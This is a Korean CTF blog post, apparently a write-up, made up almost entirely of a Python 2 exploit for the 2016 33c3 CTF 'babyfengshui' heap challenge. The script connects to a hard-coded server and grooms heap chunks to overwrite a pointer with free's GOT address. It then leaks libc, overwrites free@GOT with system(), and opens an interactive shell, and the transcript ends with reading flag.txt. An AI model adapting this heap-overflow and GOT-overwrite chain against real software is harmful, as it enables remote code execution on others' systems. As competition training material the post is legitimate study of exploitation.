본문 바로가기
Security/[게임] CTF 풀이

[exploit] 2016 33c3 CTF - babyfengshui

by blackcon 2016. 12. 30.
#!/usr/bin/env python
import socket
import struct
import telnetlib
p = lambda x:   struct.pack( "<I", x )
up = lambda x:  struct.unpack( "<I", x )[0]

host = "78.46.224.83"
port = 1456

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect(( host, port ))

def u_recv( st ):
        bf = ''
        while st not in bf:
                bf += s.recv( 1 )
        return bf

## add a user
print "[+] add a user"
for i in range( 2 ):
        u_recv( "Action: " )
        s.send("0\n")
        u_recv( "size of description: " )
        s.send( "16\n" )
        u_recv( "name: " )
        s.send( "aaaa\n" )
        u_recv( "text length: " )
        s.send( "16\n" )
        u_recv( "text: " )
        s.send( "bbbb\n" )
## delete a user
print "[+] delete a user"
u_recv( "Action: " )
s.send( "1\n" )
u_recv( "index: " )
s.send( "0\n" )

## add a user
## overwrite any table
print "[+] overwrite the header of chunk"
u_recv( "Action: " )
s.send( "0\n" )
u_recv( "size of description: " )
s.send( "128\n" )
u_recv( "name: " )
s.send( "cccc\n" )
u_recv( "text length: " )
s.send( "164\n" )
u_recv( "text: " )
pay = "/bin/sh\x00"
pay += "a" * (160-len(pay))
pay += p( 0x804b010 )   # free
s.send( pay+"\n" )
u_recv( "Action: " )
s.send( "2\n" )
u_recv( "index: " )
s.send( "1\n" )
leak = u_recv( "Action: " )
leak = leak.split( "description: " )[1]
leak = up( leak[:4] )           # memory address free()

## libc_2.19.so
libc_base = leak - 0x000760f0
system = libc_base + 0x0003e3e0
binsh = libc_base + 0x15f551
print "[!] LIBC_BASE: %x, system: %x, binsh: %x" % (libc_base, system, binsh)

## owverwrite free_got to system()
print "[+] overwrite the free_got"
s.send( "3\n" )
u_recv( "index: " )
s.send( "1\n" )
u_recv( "text length: " )
s.send( "4\n" )
u_recv( "text: " )
s.send( p(system)+"\n" )

## trigger
print "[+] get the shell :D"
u_recv( "Action: " )
s.send( "1\n" )
u_recv( "index: " )
s.send( "2\n" )

t = telnetlib.Telnet()
t.sock = s
t.interact()


'''
blackcon@bk{~/33c3_ctf/pwn/babyfengshui}:./vuln.py
[+] add a user
[+] delete a user
[+] overwrite the header of chunk
[!] LIBC_BASE: f75de000, system: f761c3e0, binsh: f773d551
[+] overwrite the free_got
[+] get the shell :D
id
uid=1000(fengshui) gid=1000(fengshui) groups=1000(fengshui)
ls
babyfengshui
flag.txt
cat flag.txt
33C3_h34p_3xp3rts_c4n_gr00m_4nd_f3ng_shu1
'''